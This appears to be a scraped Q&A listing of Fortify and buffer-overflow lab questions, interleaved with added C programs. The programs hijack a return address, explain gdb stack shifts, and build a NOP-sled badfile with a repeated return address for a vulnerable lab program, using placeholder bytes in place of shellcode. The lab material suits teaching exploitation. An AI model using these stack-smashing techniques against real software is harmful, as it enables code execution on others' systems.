fortify-source

HP Fortify : ASP.NET Bad Practices: Non-Serializable Object Stored in Session

徘徊边缘 submitted on 2021-02-08 15:15:31
Question: The method set_UserActiveEnvironments() in HttpContextHelper.cs stores a non-serializable object as an HttpSessionState attribute on line 47, which can damage application reliability. By default, ASP.NET servers store the HttpSessionState object, its attributes and any objects they reference in memory. This model limits active session state to what can be accommodated by the system memory of a single machine. In order to expand capacity beyond these limitations, servers are frequently

Fortify: Access Control Database related issue

青春壹個敷衍的年華 submitted on 2020-01-02 10:20:55
Question: We have been using the Fortify tool on our code to check for security vulnerabilities. We were able to fix most of the issues, but there are some issues which we are finding hard to fix. One of them is related to access control: database-related issues. We use Hibernate criteria within our code to fetch records from the DB, and Fortify complains that the data we get from the DB and place into the program is from an untrusted source. Below is the same code:

    Criteria criteria = hibernatessn.createCriteria("com.vish

Buffer overflow works in gdb but not without it

我是研究僧i submitted on 2019-12-27 16:28:15
Question: I am on CentOS 6.4 32 bit and am trying to cause a buffer overflow in a program. Within GDB it works. Here is the output:

    [root@localhost bufferoverflow]# gdb stack
    GNU gdb (GDB) Red Hat Enterprise Linux (7.2-60.el6_4.1)
    Copyright (C) 2010 Free Software Foundation, Inc.
    License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
    This is free software: you are free to change and redistribute it.
    There is NO WARRANTY, to the extent permitted by law. Type "show copying" and
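
The usual reason an overflow that works under gdb fails outside it is that the debuggee's initial stack is laid out differently: gdb adds LINES and COLUMNS to the program's environment and starts it by its absolute path, so the argv and environment strings at the top of the stack take up a different number of bytes and every frame below them, including the buffer the exploit aims at, shifts. The program below is an added example, not part of the post above, that makes the shift visible; run it directly and under gdb and compare the printed addresses. The two-entry environment vector is a constructed sample.

```c
/* Added example (not from the original post): shows why a stack address
 * observed under gdb differs from the address the same program sees when
 * run directly. gdb sets LINES and COLUMNS in the debuggee's environment
 * and starts the program by its absolute path, so the strings above the
 * stack (argv[0], environment) change size and every frame shifts.
 *
 * Build:   gcc -O0 -g -o stackaddr stackaddr.c
 * Compare: ./stackaddr            vs.   gdb -q ./stackaddr -ex run -ex quit
 * Inside gdb, `unset environment LINES` and `unset environment COLUMNS`,
 * then run the binary by the same absolute path outside gdb (or use
 * `env -i` outside gdb) to bring the two layouts together. */
#include <stdio.h>
#include <string.h>

extern char **environ;

/* Number of entries in a NULL-terminated string vector (argv or environ). */
size_t vec_count(char **vec) {
    size_t n = 0;
    while (vec[n] != NULL)
        n++;
    return n;
}

/* Bytes the strings of a NULL-terminated vector occupy on the stack,
 * counting each string's terminating NUL. The kernel copies argv and
 * environ strings to the top of the initial stack, so this total is the
 * amount by which everything below them is pushed down. */
size_t vec_bytes(char **vec) {
    size_t total = 0;
    for (size_t i = 0; vec[i] != NULL; i++)
        total += strlen(vec[i]) + 1;
    return total;
}

/* Extra bytes an environment `with` occupies compared with one `without`;
 * a positive result means the stack sits that many bytes lower. */
long env_shift(char **with, char **without) {
    return (long)vec_bytes(with) - (long)vec_bytes(without);
}

/* Constructed sample: the two variables gdb adds when the debuggee runs
 * in a terminal. Values are typical, not measured on the poster's box. */
char *gdb_extra_env[] = { "LINES=24", "COLUMNS=80", NULL };

int main(int argc, char **argv) {
    char buffer[64];                       /* stand-in for the target buffer */
    memset(buffer, 0, sizeof buffer);
    (void)argc;

    printf("argv[0]              : %s (%zu bytes)\n", argv[0], strlen(argv[0]) + 1);
    printf("environment          : %zu variables, %zu bytes\n",
           vec_count(environ), vec_bytes(environ));
    printf("&buffer              : %p\n", (void *)buffer);
    printf("LINES+COLUMNS alone  : %zu bytes of shift\n",
           vec_bytes(gdb_extra_env));
    return 0;
}
```

A difference of a few dozen bytes is enough to miss a return address that points exactly at a buffer; a NOP sled wider than the observed shift, or matching the environment and argv[0] between the two runs, is what makes the address found in gdb valid outside it.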

How to run HP fortify scan using gradle or Running Fortify from Gradle build on Jenkins

偶尔善良 submitted on 2019-12-24 04:56:31
Question: I'm using the following code to run Fortify using Gradle, but this code takes time to generate reports. I'm not sure how to optimize this script to run faster; it would be great if someone could help me optimize this script.

    // Add a new configuration
    configurations {
        fortify {
            extendsFrom compile
        }
    }

    // pull in the fortify libs for the new configuration
    dependencies {
        fortify fileTree(dir: 'C:/Program Files/Fortify Software/HP Fortify v3.20/Core/lib', include: '*.jar')
    }

    task fortifyReport

Causing a buffer Overflow with fgets

≯℡__Kan透↙ submitted on 2019-12-19 05:24:11
Question: I'm experimenting with buffer overflows and try to overwrite the return address of the stack with a certain input of fgets. This is the code:

    #include <stdio.h>
    #include <string.h>

    void foo() {
        fprintf(stderr, "You did it.\n");
    }

    void bar() {
        char buf[20];
        puts("Input:");
        fgets(buf, 24, stdin);    /* stores at most 23 characters plus a NUL into a 20-byte buffer */
        printf("Your input:.\n", strlen(buf));
    }

    int main(int argc, char **argv) {
        bar();
        return 0;
    }

On a normal execution the program just returns your input. I want it to output foo() without modifying the code. My idea was to overflow the buffer

How can I invoke buffer overflow?

隐身守侯 submitted on 2019-12-18 10:16:10
Question: I got a homework assignment asking me to invoke a function without explicitly calling it, using buffer overflow. The code is basically this:

    #include <stdio.h>
    #include <stdlib.h>

    void g() {
        printf("now inside g()!\n");
    }

    void f() {
        printf("now inside f()!\n");
        // can only modify this section
        // cant call g(), maybe use g (pointer to function)
    }

    int main (int argc, char *argv[]) {
        f();
        return 0;
    }

Though I'm not sure how to proceed. I thought about changing the return address for the program
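
The idea the poster mentions, changing f()'s return address, can be carried out without hard-coding a frame offset: f() asks the compiler for its own return address, scans upward from one of its locals for the stack slot that holds that value, and overwrites the slot with the address of g(). The program below is an added example, not the assignment's code or an answer from the thread; only the marked section of f() differs from the posted code. It assumes GCC or Clang on x86/x86-64 Linux (for __builtin_return_address and a downward-growing stack with the return address above the locals); the scan itself is undefined behaviour as far as the C standard goes, and mock_frame is a constructed array used only to exercise the search.

```c
/* Added example (not the original assignment code): make f()'s `ret`
 * land in g() by overwriting the saved return address. Only f() changes.
 * Build: gcc -O0 -o hijack hijack.c
 * The stack protector does not interfere: the canary lies below the
 * return address and is never written. After g() prints, its own `ret`
 * pops a word that was never a return address, so the process does not
 * get back to main() cleanly; that is inherent in this trick. */
#include <stdio.h>
#include <stdint.h>
#include <stddef.h>

void g(void) {
    printf("now inside g()!\n");
}

/* Index of the first slot in slots[0..max) equal to `target`, or -1.
 * `skip` names one slot to ignore (the local that holds our own copy of
 * the target value, which would otherwise match first). Kept separate so
 * the search can be exercised on an ordinary array. */
long find_slot(uintptr_t *slots, size_t max, uintptr_t target,
               const uintptr_t *skip) {
    for (size_t i = 0; i < max; i++) {
        if (&slots[i] == skip)
            continue;
        if (slots[i] == target)
            return (long)i;
    }
    return -1;
}

/* Constructed mock frame for testing the search: two locals, a
 * canary-like value, a saved frame pointer, then the return address.
 * The numbers are arbitrary, not addresses from a real process. */
uintptr_t mock_frame[] = { 0x11, 0x22, 0xdeadbeef, 0x7ffd0000, 0x401136 };

void f(void) {
    printf("now inside f()!\n");
    /* --- only this section is modified --- */
    volatile uintptr_t anchor = 0;          /* a local that lives on the stack */
    uintptr_t target = (uintptr_t)__builtin_return_address(0);
    uintptr_t *slots = (uintptr_t *)&anchor;
    long idx = find_slot(slots, 32, target, &target);   /* at most 32 words up */
    if (idx >= 0)
        slots[idx] = (uintptr_t)&g;         /* f()'s `ret` now jumps to g() */
    /* --- end of modified section --- */
}

int main(int argc, char *argv[]) {
    (void)argc; (void)argv;
    f();
    return 0;
}
```

Scanning for the saved value instead of assuming "buffer + 8" or "+ 12" is what keeps the demonstration working across -O0 builds of gcc and clang, which lay out locals differently; the buffer-overflow variant of the same assignment has to find that offset by hand.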

Buffer Overflow Vulnerability Lab problems

左心房为你撑大大i submitted on 2019-12-13 00:42:42
Question: I have a lab assignment that I am stuck on. Basically, I have to take advantage of a buffer overflow to generate a shell that has root privileges. I have to use 2 separate .c files. Here is the first one, stack.c:

    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>

    int bof(char *str) {
        char buffer[12];
        //BO Vulnerability
        strcpy(buffer, str);
        return 1;
    }

    int main(int argc, char* argv[]) {
        char str[517];
        FILE *badfile;
        badfile = fopen("badfile", "r");
        fread(str, sizeof(char), 517, badfile);

Buffer Overflow - SegFaults in regular user

依然范特西╮ submitted on 2019-12-10 06:31:33
Question: Below is my code, both the vulnerable program (stack.c) and my exploit (exploit.c). This code works on a pre-packaged Ubuntu 9 that the prof sent out for Windows users (I had a friend test it on his computer), but on Ubuntu 12 that I run on my iMac, I get segfaults when I try to do this as a normal user. Here's stack:

    //stack.c
    #include <stdio.h>
    #include <string.h>

    int bof(char *str) {
        char buffer[12];
        //BO Vulnerability
        strcpy(buffer, str);
        return 1;
    }

    int main(int argc, char* argv[]) {
        char str[517];
        FILE
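
The three overflow posts above (the fgets question and the two stack.c/badfile lab questions) all turn on the same bookkeeping: how far past the buffer a given write can reach, and where in the 517-byte file the return address and the NOP sled have to sit. The program below is an added example, not the lab's exploit.c or anything from the posts. It assumes the usual layout for this lab (padding, then the return address repeated, then a NOP sled, then the payload) and a little-endian 32-bit x86 target like the poster's Ubuntu VM. The return-address value, its offset from buffer[0] and the payload bytes are constructed placeholders: the offset and address are what the student has to measure with gdb on the lab machine, and the "payload" is eight int3 bytes, not shellcode.

```c
/* Added example (not the lab's exploit.c): builds the 517-byte `badfile`
 * that stack.c reads into str[517] and copies into a 12-byte buffer with
 * strcpy(). overflow_reach() answers the reach question for the fgets
 * post as well. Build: gcc -O0 -o mkbadfile mkbadfile.c && ./mkbadfile */
#include <stdio.h>
#include <stdint.h>
#include <string.h>

#define BADFILE_LEN 517   /* main() in stack.c reads exactly 517 bytes */

/* Bytes written past the end of a `buf_size` buffer by a write of
 * `write_len` bytes (0 when it fits). For fgets(buf, n, ...) pass n:
 * fgets stores at most n-1 characters plus a terminating NUL. */
size_t overflow_reach(size_t buf_size, size_t write_len) {
    return write_len > buf_size ? write_len - buf_size : 0;
}

/* Index of the first NUL in buf[0..n), or -1 if there is none. strcpy()
 * stops at the first NUL, so nothing after it reaches the stack. */
long first_nul(const unsigned char *buf, size_t n) {
    const unsigned char *p = memchr(buf, 0, n);
    return p ? (long)(p - buf) : -1;
}

/* Fill out[0..len) with the badfile image. `ret_offset` is the distance
 * from buffer[0] to the saved return address, `ret_addr` the value to
 * put there; it is repeated over eight 4-byte slots so that being off by
 * a word or two in ret_offset still hits. Everything else is 0x90 (x86
 * NOP), the payload goes at the very end, and the only NUL is the last
 * byte. Returns the offset where the sled starts, or -1 if it cannot be
 * built (pieces do not fit, or a zero byte would end strcpy early). */
long build_badfile(unsigned char *out, size_t len,
                   size_t ret_offset, uint32_t ret_addr,
                   const unsigned char *payload, size_t payload_len) {
    const size_t copies = 8;
    size_t sled_start = ret_offset + 4 * copies;
    if (sled_start + payload_len + 1 > len)
        return -1;
    if (memchr(&ret_addr, 0, sizeof ret_addr) != NULL ||
        memchr(payload, 0, payload_len) != NULL)
        return -1;
    memset(out, 0x90, len);
    for (size_t off = ret_offset; off + 4 <= sled_start; off += 4)
        memcpy(out + off, &ret_addr, 4);   /* host and target both little-endian x86 */
    memcpy(out + len - 1 - payload_len, payload, payload_len);
    out[len - 1] = '\0';
    return (long)sled_start;
}

/* Constructed placeholders; the real values come from gdb on the lab VM. */
static const size_t   placeholder_ret_offset = 24;          /* buffer[0] -> saved return address */
static const uint32_t placeholder_ret_addr   = 0xbffff1a0u; /* must point into the sled; no zero bytes */
static const unsigned char placeholder_payload[8] =         /* int3 stand-in, not shellcode */
    { 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC };

unsigned char demo_image[BADFILE_LEN];

/* Build the image with the placeholder values; returns the sled offset. */
long demo_build(void) {
    return build_badfile(demo_image, BADFILE_LEN,
                         placeholder_ret_offset, placeholder_ret_addr,
                         placeholder_payload, sizeof placeholder_payload);
}

int main(void) {
    long sled = demo_build();
    if (sled < 0) {
        fprintf(stderr, "layout does not fit or contains a NUL\n");
        return 1;
    }
    FILE *fp = fopen("badfile", "wb");
    if (fp == NULL) {
        perror("badfile");
        return 1;
    }
    fwrite(demo_image, 1, BADFILE_LEN, fp);
    fclose(fp);
    printf("sled starts at offset %ld, first NUL at %ld\n",
           sled, first_nul(demo_image, BADFILE_LEN));
    printf("fgets(buf, 24) into char[20] reaches %zu bytes past the buffer\n",
           overflow_reach(20, 24));
    printf("strcpy of 517 bytes into char[12] reaches %zu bytes past it\n",
           overflow_reach(12, 517));
    return 0;
}
```

Two things this makes explicit that the posts stumble on: with fgets(buf, 24, stdin) and char buf[20] the write can go only 4 bytes past the buffer, and the last of those is the NUL, so the reach is much shorter than the 517-byte strcpy case; and the file must be NUL-free up to its last byte, otherwise strcpy stops before the return-address slot and the overflow never happens. Segfaults that appear only on a newer Ubuntu are usually the protections the lab asks you to turn off (ASLR via /proc/sys/kernel/randomize_va_space, the non-executable stack and the stack protector at compile time); the builder above does nothing about those.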